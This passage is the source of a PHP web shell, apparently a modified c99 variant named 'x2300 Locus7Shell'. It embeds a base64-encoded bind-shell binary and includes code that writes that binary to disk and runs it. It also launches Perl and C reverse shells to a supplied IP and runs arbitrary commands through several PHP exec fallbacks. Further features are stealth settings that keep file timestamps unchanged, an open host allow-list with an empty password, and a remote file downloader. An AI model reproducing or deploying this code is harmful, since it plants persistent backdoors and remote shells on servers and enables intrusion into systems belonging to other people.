yb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAAAIlEJASLRfCJBCToKP7//4XAeRjHBCSTiQQI6Kj9///HBCQBAAAA6Bz+///HRCQECAAAAItF8IkEJOi5/f//hcB5GMcEJJiJBAjoef3//8cEJAEAAADo7f3//8dF6BAAAACNReiNVcSJRCQIiVQkBItF8IkEJOht/f//iUX0g330AHkMxwQkjIkECOg4/f//6EP9//+FwA+EpwAAAItF+Ln/////iUW4uAAAAAD8i3248q6JyPfQg+gBx0QkDAAAAACJRCQIi0X4iUQkBItF9IkEJOiQ/f//x0QkBAAAAACLRfSJBCToPf3//8dEJAQBAAAAi0X0iQQk6Cr9///HRCQEAgAAAItF9IkEJOgX/f//x0QkCAAAAADHRCQEn4kECMcEJJ+JBAjoe/z//4tF8IkEJOiA/P//xwQkAAAAAOgE/f//i0X0iQQk6Gn8///pDv///1WJ5VdWMfZT6H/9//+BwyMSAACD7AzoEfz//42DIP///42TIP///4lF8CnQwfgCOcZzFonX/xSyi0Xwg8YBKfiJ+sH4AjnGcuyDxAxbXl9dw1WJ5YPsGIld9Ogt/f//gcPREQAAiXX4iX38jbMg////jbsg////Kf7B/gLrA/8Ut4PuAYP+/3X16DoAAACLXfSLdfiLffyJ7F3DkFWJ5VOD7AShrJkECIP4/3QSu6yZBAj/0ItD/IPrBIP4/3Xzg8QEW13DkJCQVYnlU+i7/P//gcNfEQAAg+wE6LH8//+DxARbXcMAAAADAAAAAQACADo6IHc0Y2sxbmctc2hlbGwgKFByaXZhdGUgQnVpbGQgdjAuMykgYmluZCBzaGVsbCBiYWNrZG9vciA6OiAKCgBzb2NrZXQAYmluZABsaXN0ZW4AL2Jpbi9zaAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAACQAAAAMAAAAiIQECA0AAAAkiQQIBAAAAEiBBAgFAAAAEIMECAYAAADggQQICgAAALAAAAALAAAAEAAAABUAAAAAAAAAAwAAAIyaBAgCAAAAeAAAABQAAAARAAAAFwAAABCEBAgRAAAACIQECBIAAAAIAAAAEwAAAAgAAAD+//9v6IMECP///28BAAAA8P//b8CDBAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwJkECAAAAAAAAAAAtoQECMaEBAjWhAQI5oQECPaEBAgGhQQIFoUECCaFBAg2hQQIRoUECFaFBAhmhQQIdoUECIaFBAiWhQQIAAAAAAAAAAC4mQQIAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAEdDQzogKEdOVSkgNC4wLjMgKFVidW50dSA0LjAuMy0xdWJ1bnR1NSkAAEdDQzogKEdOVSkgNC4wLjMgKFVidW50dSA0LjAuMy0xdWJ1bnR1NSkAAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAEdDQzogKEdOVSkgNC4wLjMgKFVidW50dSA0LjAuMy0xdWJ1bnR1NSkAAEdDQzogKEdOVSkgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAAAAcAAAAAgAAAAAABAAAAAAAoIUECCIAAAAAAAAAAAAAADQAAAACAAsBAAAEAAAAAADohQQIBAAAACSJBAgSAAAAiIQECAsAAADEhQQIJAAAAAAAAAAAAAAALAAAAAIAmwEAAAQAAAAAAOiFBAgEAAAAO4kECAYAAACdhAQIAgAAAAAAAAAAAAAAIQAAAAIAegAAAJEAAAB5AAAAX0lPX3N0ZGluX3VzZWQAAAAAAHYAAAACAAAAAAAEAQAAAACghQQIwoUECC4uL3N5c2RlcHMvaTM4Ni9lbGYvc3RhcnQuUwAvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvZ2xpYmMtMi4zLjYvY3N1AEdOVSBBUyAyLjE2LjkxAAGAjQAAAAIAFAAAAAQBWwAAAMSFBAjEhQQIYgAAAAEAAAAAEQAAAAKQAAAABAcCVAAAAAEIAp0AAAACBwKLAAAABAcCVgAAAAEGAgcAAAACBQNpbnQABAUCRgAAAAgFAoYAAAAIBwJLAAAABAUCkAAAAAQHAl0AAAABBgSwAAAAARmLAAAAAQUDSIkECAVPAAAAAIwAAAACAFYAAAAEAYIAAAAvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdS9jcnRpLlMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBHTlUgQVMgMi4xNi45MQABgIwAAAACAGYAAAAEAS8BAAAvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdS9jcnRuLlMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBHTlUgQVMgMi4xNi45MQABgAERABAGEQESAQMIGwglCBMFAAAAAREBEAYSAREBJQ4TCwMOGw4AAAIkAAMOCws+CwAAAyQAAwgLCz4LAAAENAADDjoLOwtJEz8MAgoAAAUmAEkTAAAAAREAEAYDCBsIJQgTBQAAAAERABAGAwgbCCUIEwUAAABXAAAAAgAyAAAAAQH7Dg0AAQEBAQAAAAEAAAEuLi9zeXNkZXBzL2kzODYvZWxmAABzdGFydC5TAAEAAAAABQKghQQIA8AAATMhND0lIgMYIFlaISJcWwIBAAEBIwAAAAIAHQAAAAEB+w4NAAEBAQEAAAABAAABAGluaXQuYwAAAAAAqQAAAAIAUAAAAAEB+w4NAAEBAQEAAAABAAABL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UAAGNydGkuUwABAAAAAAUC6IUECAPAAAE9AgEAAQEABQIkiQQIAy4BIS8hWWcCAwABAQAFAoiEBAgDHwEhLz0CBQABAQAFAsSFBAgDCgEhLyFZZz1nLy8wPSEhAgEAAQGIAAAAAgBQAAAAAQH7Dg0AAQEBAQAAAAEAAAEvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdQAAY3J0bi5TAAEAAAAABQLohQQIAyEBPQIBAAEBAAUCO4kECAMSAT0hIQIBAAEBAAUCnYQECAMJASECAQABAWluaXQuYwBzaG9ydCBpbnQAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBsb25nIGxvbmcgaW50AHVuc2lnbmVkIGNoYXIAR05VIEMgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAbG9uZyBsb25nIHVuc2lnbmVkIGludABzaG9ydCB1bnNpZ25lZCBpbnQAX0lPX3N0ZGluX3VzZWQAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmludGVycAAubm90ZS5BQkktdGFnAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5keW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAuZGVidWdfYXJhbmdlcwAuZGVidWdfcHVibmFtZXMALmRlYnVnX2luZm8ALmRlYnVnX2FiYnJldgAuZGVidWdfbGluZQAuZGVidWdfc3RyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAACAAAAFIEECBQBAAATAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAACiBBAgoAQAAIAAAAAAAAAAAAAAABAAAAAAAAAAxAAAABQAAAAIAAABIgQQISAEAAJgAAAAEAAAAAAAAAAQAAAAEAAAANwAAAAsAAAACAAAA4IEECOABAAAwAQAABQAAAAEAAAAEAAAAEAAAAD8AAAADAAAAAgAAABCDBAgQAwAAsAAAAAAAAAAAAAAAAQAAAAAAAABHAAAA////bwIAAADAgwQIwAMAACYAAAAEAAAAAAAAAAIAAAACAAAAVAAAAP7//28CAAAA6IMECOgDAAAgAAAABQAAAAEAAAAEAAAAAAAAAGMAAAAJAAAAAgAAAAiEBAgIBAAACAAAAAQAAAAAAAAABAAAAAgAAABsAAAACQAAAAIAAAAQhAQIEAQAAHgAAAAEAAAACwAAAAQAAAAIAAAAdQAAAAEAAAAGAAAAiIQECIgEAAAXAAAAAAAAAAAAAAABAAAAAAAAAHAAAAABAAAABgAAAKCEBAigBAAAAAEAAAAAAAAAAAAABAAAAAQAAAB7AAAAAQAAAAYAAACghQQIoAUAAIQDAAAAAAAAAAAAAAQAAAAAAAAAgQAAAAEAAAAGAAAAJIkECCQJAAAdAAAAAAAAAAAAAAABAAAAAAAAAIcAAAABAAAAAgAAAESJBAhECQAAYwAAAAAAAAAAAAAABAAAAAAAAACPAAAAAQAAAAIAAACoiQQIqAkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAmQAAAAEAAAADAAAArJkECKwJAAAIAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAABAAAAAwAAALSZBAi0CQAACAAAAAAAAAAAAAAABAAAAAAAAACnAAAAAQAAAAMAAAC8mQQIvAkAAAQAAAAAAAAAAAAAAAQAAAAAAAAArAAAAAYAAAADAAAAwJkECMAJAADIAAAABQAAAAAAAAAEAAAACAAAALUAAAABAAAAAwAAAIiaBAiICgAABAAAAAAAAAAAAAAABAAAAAQAAAC6AAAAAQAAAAMAAACMmgQIjAoAAEgAAAAAAAAAAAAAAAQAAAAEAAAAwwAAAAEAAAADAAAA1JoECNQKAAAMAAAAAAAAAAAAAAAEAAAAAAAAAMkAAAAIAAAAAwAAAOCaBAjgCgAABAAAAAAAAAAAAAAABAAAAAAAAADOAAAAAQAAAAAAAAAAAAAA4AoAACYBAAAAAAAAAAAAAAEAAAAAAAAA1wAAAAEAAAAAAAAAAAAAAAgMAACIAAAAAAAAAAAAAAAIAAAAAAAAAOYAAAABAAAAAAAAAAAAAACQDAAAJQAAAAAAAAAAAAAAAQAAAAAAAAD2AAAAAQAAAAAAAAAAAAAAtQwAACsCAAAAAAAAAAAAAAEAAAAAAAAAAgEAAAEAAAAAAAAAAAAAAOAOAAB2AAAAAAAAAAAAAAABAAAAAAAAABABAAABAAAAAAAAAAAAAABWDwAAuwEAAAAAAAAAAAAAAQAAAAAAAAAcAQAAAQAAADAAAAAAAAAAEREAAL8AAAAAAAAAAAAAAAEAAAABAAAAEQAAAAMAAAAAAAAAAAAAANARAAAnAQAAAAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAABIGAAA8AUAACEAAAA/AAAABAAAABAAAAAJAAAAAwAAAAAAAAAAAAAAOB4AALIDAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQIAAAAAAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAADggQQIAAAAAAMABAAAAAAAEIMECAAAAAADAAUAAAAAAMCDBAgAAAAAAwAGAAAAAADogwQIAAAAAAMABwAAAAAACIQECAAAAAADAAgAAAAAABCEBAgAAAAAAwAJAAAAAACIhAQIAAAAAAMACgAAAAAAoIQECAAAAAADAAsAAAAAAKCFBAgAAAAAAwAMAAAAAAAkiQQIAAAAAAMADQAAAAAARIkECAAAAAADAA4AAAAAAKiJBAgAAAAAAwAPAAAAAACsmQQIAAAAAAMAEAAAAAAAtJkECAAAAAADABEAAAAAALyZBAgAAAAAAwASAAAAAADAmQQIAAAAAAMAEwAAAAAAiJoECAAAAAADABQAAAAAAIyaBAgAAAAAAwAVAAAAAADUmgQIAAAAAAMAFgAAAAAA4JoECAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAAAAADABoAAAAAAAAAAAAAAAAAAwAbAAAAAAAAAAAAAAAAAAMAHAAAAAAAAAAAAAAAAAADAB0AAAAAAAAAAAAAAAAAAwAeAAAAAAAAAAAAAAAAAAMAHwAAAAAAAAAAAAAAAAADACAAAAAAAAAAAAAAAAAAAwAhAAEAAAAAAAAAAAAAAAQA8f8MAAAAAAAAAAAAAAAEAPH/KAAAAAAAAAAAAAAABADx/y8AAAAAAAAAAAAAAAQA8f86AAAAAAAAAAAAAAAEAPH/dAAAAMSFBAgAAAAAAgAMAIQAAAAAAAAAAAAAAAQA8f+PAAAArJkECAAAAAABABAAnQAAALSZBAgAAAAAAQARAKsAAAC8mQQIAAAAAAEAEgC4AAAA4JoECAEAAAABABcAxwAAANyaBAgAAAAAAQAWAM4AAADshQQIAAAAAAIADADkAAAAG4YECAAAAAACAAwAhAAAAAAAAAAAAAAABADx//AAAACwmQQIAAAAAAEAEAD9AAAAuJkECAAAAAABABEACgEAAKiJBAgAAAAAAQAPABgBAAC8mQQIAAAAAAEAEgAkAQAA+IgECAAAAAACAAwALwAAAAAAAAAAAAAABADx/zoBAAAAAAAAAAAAAAQA8f90AQAAAAAAAAAAAAAEAPH/eAEAAMCZBAgAAAAAAQITAIEBAACsmQQIAAAAAAAC8f+SAQAArJkECAAAAAAAAvH/pQEAAKyZBAgAAAAAAALx/7YBAACMmgQIAAAAAAECFQDMAQAArJkECAAAAAAAAvH/3wEAAAAAAAB1AQAAEgAAAPABAAAAAAAAcQAAABIAAAABAgAARIkECAQAAAARAA4ACAIAAAAAAADMAAAAEgAAABoCAAAAAAAAWgAAABIAAAAqAgAA2JoECAAAAAARAhYANwIAAK2IBAhKAAAAEgAMAEcCAAAAAAAAeAAAABIAAABZAgAAiIQECAAAAAASAAoAXwIAAAAAAAA5AAAAEgAAAHECAAAAAAAAOQAAABIAAACHAgAAoIUECAAAAAASAAwAjgIAAFyIBAhRAAAAEgAMAJ4CAADgmgQIAAAAABAA8f+qAgAAQIYECBwCAAASAAwArwIAAAAAAADmAAAAEgAAAMwCAAAAAAAAOgAAABIAAADcAgAA1JoECAAAAAAgABYA5wIAAAAAAAA5AAAAEgAAAPcCAAAkiQQIAAAAABIADQD9AgAAAAAAALkAAAASAAAADQMAAAAAAAArAAAAEgAAAB0DAADgmgQIAAAAABAA8f8kAwAA6IUECAAAAAASAgwAOwMAAOSaBAgAAAAAEADx/0ADAAAAAAAAeAAAABIAAABQAwAAAAAAAA4AAAASAAAAYQMAAEiJBAgEAAAAEQAOAHADAADUmgQIAAAAABAAFgB9AwAAAAAAADkAAAASAAAAjwMAAAAAAAAAAAAAIAAAAKMDAAAAAAAAAAAAACAAAAAAYWJpLW5vdGUuUwAuLi9zeXNkZXBzL2kzODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A"; + +function checkproxyhost(){ +$host = getenv("HTTP_HOST"); +$filename = '/tmp/.setan/xh'; +if (file_exists($filename)) { +$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>"; +} else { +$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>"; + } +} + +if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) +{ + $ip = gethostbyname($_SERVER["HTTP_HOST"]); + $por = $_POST['backconnectport']; + if(is_writable(".")){ + cfb("shbd",$backdoor); + ex("chmod 777 shbd"); + $cmd = "./shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data"; + }else{ + cfb("/tmp/shbd",$backdoor); + ex("chmod 777 /tmp/shbd"); + $cmd = "./tmp/shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data"; +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) +{ + if(is_writable(".")){ + cf("back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + if (file_exists("back")) { unlink("back"); } + }else{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + if (file_exists("/tmp/back")) { unlink("/tmp/back"); } +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) +{ + if(is_writable(".")){ + cf("backc",$back_connect_c); + ex("chmod 777 backc"); + //$blah = ex("gcc back.c -o backc"); + $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("backc")) { unlink("backc"); } + }else{ + ex("chmod 777 /tmp/backc"); + cf("/tmp/backc",$back_connect_c); + //$blah = ex("gcc -o /tmp/backc /tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function cfb($fname,$text) +{ + $w_file=@fopen($fname,"w") or bberr(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function err() +{ +$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>"; +} + +function bberr() +{ +$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>"; +} + +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +//EoW + + + + + + + + + + + + + + + + +//Start Enumerate function +//function ENUMERATE() + +$hostname_x=php_uname(n); +$itshome = getcwd(); +$itshome = str_replace("/home/","~",$itshome); +$itshome = str_replace("/public_html","/x2300.php",$itshome); +$enumerate = "http://".$hostname_x."/".$itshome.""; + +//End Enumerate function + +//Starting calls +ini_set("max_execution_time",0); +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +$adires=""; +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0a beta"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "<a href=\"http://locus7s.com\">x2300 Locus7Shell v.".$shver."</a>: access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://locus7s.com/files/lshell_update/"; //Update server +$c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "<center><b>x2300 Locus7Shell Modified by #!physx^ </b></center>"; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} +$dizin = str_replace("\\\\","\\",$dizin); +$dizinispd = htmlspecialchars($dizin); +/*dizin*/ +$real = realpath($dizinispd); +$path = basename ($PHP_SELF); +function dosyayicek($link,$file) +{ + $fp = @fopen($link,"r"); + while(!feof($fp)) + { + $cont.= fread($fp,1024); + } + fclose($fp); + + $fp2 = @fopen($file,"w"); + fwrite($fp2,$cont); + fclose($fp2); +} + + + + +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "<b>" (default) + string {closetag} - close html-tag, e.g. "</b>" (default) 